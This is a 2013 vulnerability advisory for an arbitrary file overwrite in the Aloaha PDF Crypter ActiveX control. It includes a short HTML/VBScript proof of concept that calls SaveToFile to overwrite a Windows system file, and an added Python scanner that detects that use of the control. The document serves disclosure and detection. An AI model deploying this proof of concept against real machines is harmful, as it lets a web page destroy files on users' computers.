Aloaha PDF Crypter 3.5.0.1164 File Overwrite

2013.01.25
Credit: shinnai
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

============================================================================================
TITLE:
============================================================================================

Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite

url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip

author: shinnai (http://shinnai.altervista.org)

============================================================================================
FILE INFO:
============================================================================================

File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec

============================================================================================
ACTIVEX INFO:
============================================================================================

ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class

Safety report:
    RegKey Safe for Script: False
    RegKey Safe for Init: False
    Implements IObjectSafety: True
    IDisp Safe: Safe for untrusted: caller,data

============================================================================================
BUG:
============================================================================================

This ActiveX control contains the "SaveToFile" method, which could be used to overwrite
arbitrary files on the user's PC.

============================================================================================
PROOF OF CONCEPT
============================================================================================

<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
  test.SaveToFile "c:\windows\_system.ini"
</script>
</html>

============================================================================================
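For detection, the following added example (not part of the original advisory) scans HTML content, such as saved pages or proxy captures, for instantiation of this control by CLSID or ProgID and for `SaveToFile` calls made on it. The function and variable names are hypothetical, and both sample documents are constructed.

```python
import re
from html.parser import HTMLParser

# Identifiers from the advisory's ACTIVEX INFO section.
CLSID = "B1E7505E-BBFD-42BF-98C9-602205A1504C"
PROGID = "EbCrypt.eb_c_PRNGenerator"

class _ObjectTags(HTMLParser):
    """Collect the ids of <object> tags whose classid is CLSID."""
    def __init__(self):
        super().__init__()
        self.object_ids = set()
    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = {k: (v or "") for k, v in attrs}
        # Normalise "clsid:{GUID}" / "CLSID:guid" to the bare upper-case GUID.
        guid = re.sub(r"(?i)^clsid:", "", a.get("classid", "").strip())
        if guid.strip("{}").upper() == CLSID:
            self.object_ids.add(a.get("id", "").lower())

def scan_html(html):
    """Return (kind, detail) findings for one HTML document."""
    tags = _ObjectTags()
    tags.feed(html)
    tags.close()
    script = "\n".join(re.findall(r"(?is)<script\b[^>]*>(.*?)</script>", html))
    findings = [("object-clsid", i or "<no id>") for i in sorted(tags.object_ids)]
    # Late-bound creation by ProgID, with or without the ".1" version suffix.
    by_progid = re.search(r"(?i)[\"']" + re.escape(PROGID) + r"(\.\d+)?[\"']", script)
    if by_progid:
        findings.append(("progid", PROGID))
    # SaveToFile with a literal path, called on a bound object id, or on any
    # variable when the control is created by ProgID in the same page.
    for m in re.finditer(r"(?i)\b(\w+)\.SaveToFile\s*\(?\s*[\"']([^\"']*)[\"']", script):
        if by_progid or m.group(1).lower() in tags.object_ids:
            findings.append(("savetofile", m.group(2)))
    return findings

# Constructed samples: the advisory's proof of concept with a braced,
# lower-case CLSID, and an unrelated page that must produce no findings.
POC = ("<html><object classid='CLSID:{b1e7505e-bbfd-42bf-98c9-602205a1504c}' id='test'>"
       "</object><script language='vbscript'>test.SaveToFile \"c:\\windows\\_system.ini\""
       "</script></html>")
BENIGN = "<html><script>stream.SaveToFile('report.pdf')</script></html>"

if __name__ == "__main__":
    for name, doc in (("poc", POC), ("benign", BENIGN)):
        print(name, scan_html(doc))
```

The scanner only sees literal path arguments and object ids present in the markup, so script that builds the CLSID or path at run time will not be matched.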

References:

http://cxsecurity.com/issue/WLB-2013010157
http://www.aloaha.com/

